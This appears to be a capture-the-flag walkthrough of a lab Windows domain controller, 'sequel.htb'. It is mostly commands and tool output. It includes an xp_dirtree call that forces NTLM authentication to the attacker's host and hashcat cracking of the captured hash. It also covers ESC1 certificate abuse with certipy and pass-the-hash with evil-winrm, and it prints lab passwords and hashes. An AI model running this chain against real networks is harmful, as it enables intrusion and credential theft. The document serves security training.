| description |
|---|
04-26-2023 |
{% embed url="https://wadcoms.github.io/" %}
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-27 11:44:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-04-27T11:45:45+00:00; +8h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-27T11:45:44+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-04-27T11:39:41
| Not valid after: 2053-04-27T11:39:41
| MD5: a88f07c39852cdde944e3fe7ad3a8997
|_SHA-1: 2b6b0afd3b49670065095d8b95719cb10c6171be
| ms-sql-ntlm-info:
| 10.129.229.159:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2023-04-27T11:45:45+00:00; +8h00m01s from scanner time.
| ms-sql-info:
| 10.129.229.159:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-27T11:45:04
|_ start_date: N/A
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
123 open
We can tell that this is a domain controller because port 88 (Kerberos) is open.
Domain obtained from 389 LDAP:
- Add to /etc/hosts
sequel.htb
At first, I attempted to run nmap, utilizing it's scripting engine to enumerate LDAP:
nmap -n -sV --script "ldap* and not brute" 10.129.229.159 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 00:42 EDT
Nmap scan report for 10.129.229.159
Host is up (0.035s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-27 12:42:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
----CUT HERE TO SAVE SPACE----
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=sequel,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sequel,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=sequel,DC=htb
| namingContexts: DC=sequel,DC=htb
| namingContexts: CN=Configuration,DC=sequel,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=sequel,DC=htb
| namingContexts: DC=DomainDnsZones,DC=sequel,DC=htb
| namingContexts: DC=ForestDnsZones,DC=sequel,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 168070
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sequel,DC=htb
| dnsHostName: dc.sequel.htb
| defaultNamingContext: DC=sequel,DC=htb
| currentTime: 20230427124241.0Z
|_ configurationNamingContext: CN=Configuration,DC=sequel,DC=htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
↪ ldapsearch -x -H ldap://10.129.229.159 -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
# extended LDIF
#
# LDAPv3
# base <DC=<1_SUBDOMAIN>,DC=<TLD>> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
- We see "a successful bind must be completed on the connection"
- This means that the credentials provided (null) are incorrect
rpcdump:
impacket-rpcdump -p 135 10.129.229.159
 (7) (2).png)
No success
Enumerate SMB shares with SMB Client:
smbclient -N -L \\\\10.129.229.159
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
- I then manually went through the following sharenames with smbget to see if I was able to access something
Discovering the SQL Server Procedures Document:
smbget -R -U "" smb://10.129.229.159/Public
Password for [] connecting to //10.129.229.159/Public:
Using workgroup WORKGROUP, guest user
smb://10.129.229.159/Public/SQL Server Procedures.pdf
Downloaded 48.39kB in 1 seconds
Access the PDF:
firefox SQL\ Server\ Procedures.pdf
.png)
SQL Server Procedures.pdf
It looks like we need to enumerate MSSQL now.
PublicUser:GuestUserCantWrite1
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.202.159 -Pn
impacket-mssqlclient PublicUser@sequel.htb
password: GuestUserCantWrite1
 (1).png)
Attempted to enable xp_cmdshell, but it did not work.
 (3).png)
Begin SMB Server:
sudo impacket-smbserver ./ -smb2support
Authenticate to MSSQL server with newly obtained credentials:
impacket-mssqlclient PublicUser@sequel.htb
password: GuestUserCantWrite1
Trigger NTLM Relay Attack:
xp_dirtree '\\10.10.14.23\any\thing'
 (6).png)
{% code overflow="wrap" %}
sql_svc::sequel:aaaaaaaaaaaaaaaa:7772050ee5ee1f89fc33c64c1d1272ef:01010000000000008051705cd579d901069a53da1cbddf9f00000000010010004d0077006b004100510071006f004400030010004d0077006b004100510071006f004400020010004f007500420077005700430056005800040010004f007500420077005700430056005800070008008051705cd579d901060004000200000008003000300000000000000000000000003000003d52eb97775a1999339f81b907194ef13041aa9cdcb498705ec7a93bf279f7190a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320033000000000000000000
{% endcode %}
This method was taken from hacktricks!
.png)
Let's attempt to crack our newly obtained NTLM hash!
- Place the entire hash into a file named hash.txt
- Use hashcat to crack hash with specified wordlist such as rockyou.txt
- Obtain password or attempt to pass the hash around the network if it fails
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt -O
cracked.txt:
{% code overflow="wrap" %}
SQL_SVC::sequel:aaaaaaaaaaaaaaaa:55c3306c2a424405a7723b2fd4438adb:01010000000000008085528dd979d90109cbfb83529a36f000000000010010006800530049006500640061006c006600030010006800530049006500640061006c006600020010006b007900590078005100640049004300040010006b007900590078005100640049004300070008008085528dd979d901060004000200000008003000300000000000000000000000003000003d52eb97775a1999339f81b907194ef13041aa9cdcb498705ec7a93bf279f7190a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320033000000000000000000:REGGIE1234ronnie
{% endcode %}
SQL_SVC:REGGIE1234ronnie
evil-winrm -i sequel.htb -u SQL_SVC -p 'REGGIE1234ronnie'
 (1).png)
Upon performing some manual enumeration of the file system, I stumbled across a SQLServer directory.
C:\SQLServer\Logs\ERRORLOG.BAK
.png)
We can see that there was a failed logon attempt for a suspicious looking user of 'NuclearMosquito3'. This clearly looks like a password. Let's try it with Ryan.Cooper!
evil-winrm -i sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3'
bloodhound-python -d sequel.htb -v -u Ryan.Cooper -p NuclearMosquito3 -gc sequel.htb -c all -ns 10.129.202.159
Opening Bloodhound:
sudo neo4j console &
bloodhound
I then placed all of this information into Bloodhound and was able to analyze the results.
 (1).png)
[?] +++++ Checking Template 'UserAuthentication' +++++
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
[!] Identity 'sequel\sql_svc' has 'GenericAll' permissions on template 'UserAuthentication'
[+] Identity 'sequel\Domain Users' has enrollment rights for template 'UserAuthentication'
Template Name: UserAuthentication
Template distinguishedname: CN=UserAuthentication,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb
Date of Creation: 11/18/2022 21:10:22
[+] Extended Key Usage: Client Authentication, Secure E-mail, Encrypting File System
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[!] Template Permissions: sequel\sql_svc : GenericAll
[+] Enrollment allowed for: sequel\Domain Users
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Related to certificate abuse?
{% embed url="https://github.com/ly4k/Certipy" %}
- GenericAll
Get-ObjectAcl -SamAccountName Ryan.Cooper -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}
AceType : AccessAllowed
ObjectDN : CN=Ryan.Cooper,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1105
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-4078382237-1492182817-2568127209-512
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Ryan.Cooper,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1105
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-548
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Ryan.Cooper,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1105
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Ryan.Cooper,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1105
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-4078382237-1492182817-2568127209-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
Tried to add Ryan.Cooper to the Admin's Group via GenericAll:
net group "domain admins" Ryan.Cooper /add /domain
Unfortunately, this did not work for me.
Based on adPEAS findings, I believe that the DC may be vulnerable to AD Certificate Abuse.
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Let's use Certipy to attempt this.
Installation:
pip3 install certipy-ad
Enumeration:
certipy find -u Ryan.Cooper@sequel.htb -p 'NuclearMosquito3' -dc-ip 10.129.203.192
Next, open up the text document generated by Certipy and you will see the vulnerability.
{% code overflow="wrap" %}
[!] Vulnerabilities
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
ESC1: 'SEQUEL.HTB\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
{% endcode %}
- We see that there is a Template 'UserAuthentication'
Using the syntax for exploit ESC1 template:
certipy req -username Ryan.Cooper@sequel.htb -password NuclearMosquito3 -ca sequel-DC-CA -target ca.sequel.htb -template UserAuthentication -upn administrator@sequel.htb -dns dc.sequel.htb
 (2).png)
certipy auth -pfx 'administrator_dc.pfx'
I ended up getting a Kerberos error: KRB_AP_ERR_SKEW(Clock skew too great) this is because our system time is not within 5 minutes of accuracy from the Kerberos server.
This can be fixed with:
sudo ntpdate <ip_of_DC>
NOTE: if you are still getting this error, go into your virtual machine settings and disable your network time sync. This was my case.
.png)
Boom! We have the hash! Time to Pass-The-Hash with Evil-WinRM!
evil-winrm -i sequel.htb -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
Go and grab that root.txt!